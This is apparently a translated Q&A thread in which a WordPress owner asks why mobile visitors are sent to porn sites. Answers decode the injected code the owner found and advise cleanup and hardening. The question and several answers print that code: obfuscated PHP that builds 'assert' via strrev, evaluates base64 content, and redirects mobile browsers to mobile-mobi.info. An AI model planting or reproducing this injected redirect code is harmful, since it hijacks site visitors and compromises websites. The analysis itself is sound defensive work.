-2

我有一个网站(wordpress)并托管在共享托管服务器上,该网站在台式机和笔记本电脑上可以正常打开,但是当我们在移动设备上打开它时,一些色情网站正在打开,甚至 .htaccess 文件的代码也被更改.

代码是

<?php
$_ = strrev("tress\x61"); @$_("e\166a\154\050b\141\163\145\066\064\137\144\145c\157\144\145\050'aWYgKChwcmVnX21hdGNoKCcvdGV4dFwvdm5kLndhcC53bWx8YXBwbGljYXRpb25cL3ZuZC53YXAueGh0bWxcK3htbC9zaScsIEAkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkgfHwgcHJlZ19tYXRjaCgnL2FsY2F0ZWx8YW1vaXxhbmRyb2lkfGF2YW50Z298YmxhY2tiZXJyeXxiZW5xfGNlbGx8Y3JpY2tldHxkb2NvbW98ZWxhaW5lfGh0Y3xpZW1vYmlsZXxpcGhvbmV8aXBhZHxpcGFxfGlwb2R8ajJtZXxqYXZhfG9wZXJhLm1pbml8bWlkcHxtbXB8bW9iaXxtb3Rvcm9sYXxuZWMtfG5va2lhfHBhbG18cGFuYXNvbmljfHBoaWxpcHN8cGhvbmV8c2FnZW18c2hhcnB8c2llLXxzbWFydHBob25lfHNvbnl8c3ltYmlhbnx0LW1vYmlsZXx0ZWx1c3x1cFwuYnJvd3Nlcnx1cFwubGlua3x2b2RhZm9uZXx3YXB8d2Vib3N8d2lyZWxlc3N8eGRhfHhvb218enRlL3NpJywgQCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgfHwgcHJlZ19tYXRjaCgnL21zZWFyY2h8bVw/cT0vc2knLCBAJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKSkgJiYgIXByZWdfbWF0Y2goJy9tYWNpbnRvc2h8YW1lcmljYXxhdmFudHxkb3dubG9hZHx3aW5kb3dzXC1tZWRpYVwtcGxheWVyfHlhbmRleHxnb29nbGUvc2knLCBAJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSkgeyBlY2hvICc8c2NyaXB0PndpbmRvdy5sb2NhdGlvbj0iaHR0cDovL21vYmlsZS1tb2JpLmluZm8vPzIiPC9zY3JpcHQ+JzsgZmx1c2goKTsgZXhpdDsgfQ=='\051\051\073");
?>

请帮忙,

提前致谢。

4

5 回答 5

0

抱歉这个问题,我试图解码你的示例代码。

这是:

if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT']) || preg_match('/alcatel|amoi|android|avantgo|blackberry|benq|cell|cricket|docomo|elaine|htc|iemobile|iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola|nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|t-mobile|telus|up\.browser|up\.link|vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || preg_match('/msearch|m\?q=/si', @$_SERVER['HTTP_REFERER'])) && !preg_match('/macintosh|america|avant|download|windows\-media\-player|yandex|google/si', @$_SERVER['HTTP_USER_AGENT'])) { echo '<script>window.location="http://mobile-mobi.info/?2"</script>'; flush(); exit; }

这会将使用移动设备的访问者重定向到特定站点。

我建议您使用恶意软件扫描程序来检查您的网站,我在服务器上使用 clamav 并在本地服务器上使用 avast 来扫描此代码,但未检测到病毒(可能是他们的数据库未更新此恶意软件信息)。

我建议您仍然需要使用恶意软件扫描程序之一来扫描您的网站,以扫描您的网站以检测其他病毒。另外,您可以使用 grep 命令搜索具有此代码的任何文件并将其手动删除

grep 命令是:

grep -R 'strrev("tress\x61");' /var/www/html

替换/var/www/html为您网站的根路径。

P/S:对不起,如果我的英语不是很好。

于 2013-04-01T05:44:21.777 回答
0
  1. 将您的 wordpress 更新到最新版本。
  2. 更新您的插件 + 主题。
  3. 对所有类似代码的文件进行快速“查找和替换”。
  4. 更改 wordpress/ftp/mysql/cp/webhost 的密码。
  5. 在你的 wordpress 上安装杀毒软件(你可以在他们的网站上找到很多)。
  6. 询问您的主机客户支持他们是否受到黑客等的攻击。
于 2013-04-01T05:32:34.577 回答
0

您应该阅读Hardening Wordpress指南 - 如果您.htaccess能够通过网络由某人编写,那么您有一个相当大的安全漏洞(如果不是多个)。

肯定想从您的 中删除该代码.htaccess,我做了一些测试,实际上它是重定向到色情网站的内容。第一行将值“assert”分配给变量$_,然后使用它来运行经过 Base64 编码的代码。简而言之,它会对您的变量进行一些匹配,并通过检查和HTTP_ACCEPT确保您不是来自搜索引擎。如果您不将 a作为查询字符串变量附加,它重定向到的 URL 只会将您发送到 Google。HTTP_USER_AGENTHTTP_REFERER?2

于 2013-04-01T05:47:28.663 回答
0

我试图解码上面的代码行, $_ = strrev("tress\x61");这一行将返回一个断言函数,并且

@$_("e\166a\154\050b\141\163\145\066\064\137\144\145c\157\144\145\050'aWYgKChwcmVnX21hdGNoKCcvdGV4dFwvdm5kLndhcC53bWx8YXBwbGljYXRpb25cL3ZuZC53YXAueGh0bWxcK3htbC9zaScsIEAkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkgfHwgcHJlZ19tYXRjaCgnL2FsY2F0ZWx8YW1vaXxhbmRyb2lkfGF2YW50Z298YmxhY2tiZXJyeXxiZW5xfGNlbGx8Y3JpY2tldHxkb2NvbW98ZWxhaW5lfGh0Y3xpZW1vYmlsZXxpcGhvbmV8aXBhZHxpcGFxfGlwb2R8ajJtZXxqYXZhfG9wZXJhLm1pbml8bWlkcHxtbXB8bW9iaXxtb3Rvcm9sYXxuZWMtfG5va2lhfHBhbG18cGFuYXNvbmljfHBoaWxpcHN8cGhvbmV8c2FnZW18c2hhcnB8c2llLXxzbWFydHBob25lfHNvbnl8c3ltYmlhbnx0LW1vYmlsZXx0ZWx1c3x1cFwuYnJvd3Nlcnx1cFwubGlua3x2b2RhZm9uZXx3YXB8d2Vib3N8d2lyZWxlc3N8eGRhfHhvb218enRlL3NpJywgQCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgfHwgcHJlZ19tYXRjaCgnL21zZWFyY2h8bVw/cT0vc2knLCBAJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKSkgJiYgIXByZWdfbWF0Y2goJy9tYWNpbnRvc2h8YW1lcmljYXxhdmFudHxkb3dubG9hZHx3aW5kb3dzXC1tZWRpYVwtcGxheWVyfHlhbmRleHxnb29nbGUvc2knLCBAJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSkgeyBlY2hvICc8c2NyaXB0PndpbmRvdy5sb2NhdGlvbj0iaHR0cDovL21vYmlsZS1tb2JpLmluZm8vPzIiPC9zY3JpcHQ+JzsgZmx1c2goKTsgZXhpdDsgfQ=='\051\051\073");

正在使用以下参数调用 assert 函数。

eval(base64_decode('malicious code encoded as base64'))

所以完整的形式如下

assert( eval (base64_decode('malicious code encoded as base64')));

部分恶意代码正在检查请求是否来自任何移动设备、平板电脑或 ipad 等。

if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT']) || preg_match('/alcatel|amoi|android|avantgo|blackberry|benq|cell|cricket|docomo|elaine|htc|iemobile|iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola|nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|t-mobile|telus|up\.browser|up\.link|vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || preg_match('/msearch|m\?q=/si', @$_SERVER['HTTP_REFERER'])) && !preg_match('/macintosh|america|avant|download|windows\-media\-player|yandex|google/si', @$_SERVER['HTTP_USER_AGENT'])) {

结论 此恶意代码检查请求是否来自移动设备(移动设备、iPad 或任何平板电脑或特定浏览器),然后重定向此请求。

您已经找到了有问题的代码,将其从您的目录中删除,您用于托管的服务器,确保其安全并具有防病毒功能,更改您的密码可能会有所帮助,同时检查您的系统是否在您上传到此代码时正确嵌入了此代码断绝。它可能不是服务器,而是您的系统。

于 2013-04-01T05:48:47.667 回答
0

大多数 wordpress hack 来自:

  • timthumb 图像大小调整插件包含在一些主题中
  • uploadify 插件提供一些上传功能
  • 简单的管理员密码(例如 admin / p@ssw0rd)
  • 允许共享计算机上的其他用户读取 wp-config.php 文件或更改您的文件(例如可写目录)的不安全权限。
  • 黑客预先存在的访问权限(例如,您一直忠实上传的某个后门脚本)

如果您无法使机器上的其他用户无法读取您的 wp-config.php,那么在您移动站点之前,您的问题将永远无法解决。

于 2013-04-04T10:57:31.843 回答